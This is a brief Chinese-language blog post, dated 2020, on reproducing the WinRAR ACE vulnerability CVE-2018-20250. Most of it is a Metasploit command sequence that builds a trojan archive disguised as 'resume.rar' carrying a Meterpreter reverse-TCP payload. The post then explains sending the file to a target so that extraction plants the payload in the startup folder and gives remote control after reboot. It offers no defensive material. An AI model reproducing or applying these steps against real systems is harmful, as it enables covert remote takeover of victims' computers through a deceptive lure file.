CVE-2018-20250(WinRAR代码执行)漏洞复现

Posted by 杨斌 on 2020-03-26
Estimated Reading Time 1 Minutes
Words 117 In Total
Viewed Times

生成winrar木马

1
2
3
4
5
6
7
8
9
10
use exploit/windows/fileformat/winrar_ace

SET FILENAME resume.rar # 木马文件名称
SET FILE_LIST /home/files.txt # 其他压缩文件目录文件
set PAYLOAD [PAYLOAD]. windows/meterpreter/reverse_tcp by default. # 设置payload, 默认是windows/meterpreter/reverse_tcp

# 设置payload参数
...

exploit # 生成木马文件在~/.msf4/local/目录下面.

利用

生成的压缩文件发送给目标, 目标解压rar文件,rar文件会将payload放在启动目录里面, 目标重启机器之后即可进行控制


If you like this blog or find it useful for you, you are welcome to comment on it. You are also welcome to share this blog, so that more people can participate in it. If the images used in the blog infringe your copyright, please contact the author to delete them. Thank you !